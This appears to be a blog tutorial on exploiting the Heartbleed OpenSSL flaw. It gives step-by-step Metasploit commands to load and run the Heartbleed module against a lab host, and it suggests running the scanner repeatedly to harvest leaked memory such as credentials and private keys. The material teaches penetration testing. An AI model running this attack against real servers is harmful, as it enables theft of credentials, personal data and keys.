The Heartbleed vulnerability enables a hacker to trick OpenSSL by sending asingle byte
of data while telling the server it sent 64K bytes of data. The server
will then send back 64K bytes of data to be checked and echoed back. The
server will then respond with 64K of random data from its memory.
In this tutorial, I’ll show you a simple exploit for getting that
OpenSSL to spill the contents of its memory and possibly give us the
user’s credentials and other information.
Disclaimer – Our tutorials are designed
to aid aspiring pen testers/security enthusiasts in learning new skills,
we only recommend that you test this tutorial on a system that belongs
to YOU. We do not accept responsibility for anyone who thinks it’s a
good idea to try to use this to attempt to hack systems that do not
belong to you
Step 1: Update Metasploit
The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:
- kali > msfupdate
Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here, it takes awhile.
When you are finally returned to the Kali prompt, the update has completed.
Step 2: Start Metasploit
Now, we need to start the Metasploit console. At any terminal prompt, type:
- kali > msfconsole
You should be greeted with a screen like that below.
Step 3: Find Heartbleed
Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:
- search heartbleed
This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.
Step 4: Use Auxiliary Module
Next, we need to load this payload. Simply type:
- use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module.
Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:
- msf > info
As we can see in the screenshot below, this reveals the options
that need to set in order to use this module and a description of the
module.
Step 5: Set Options
Although this module has numerous options, the critical one is
RHOSTS (notice the plural here). Let’s set it to a target website I set
up on my network that is still vulnerable to Heartbleed.
- msf > set RHOSTS 192.168.1.169
Step 6: Run the Module
Finally, set the option ‘verbose” to “true”. This will provide us with verbose output.
- msf > set verbose true
And now let’s run it:
- msf > run
As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.
Step 7: Success
If credentials, personally identifiable information (PII), or the
server’s private key had been in memory, they would have leaked out as
well. Of course, we could set up this Heartbleed scanner to run
repeatedly to gather the info in memory at a continual basis, eventually
gaining access to all the info that traversed RAM.
0 comments:
Post a Comment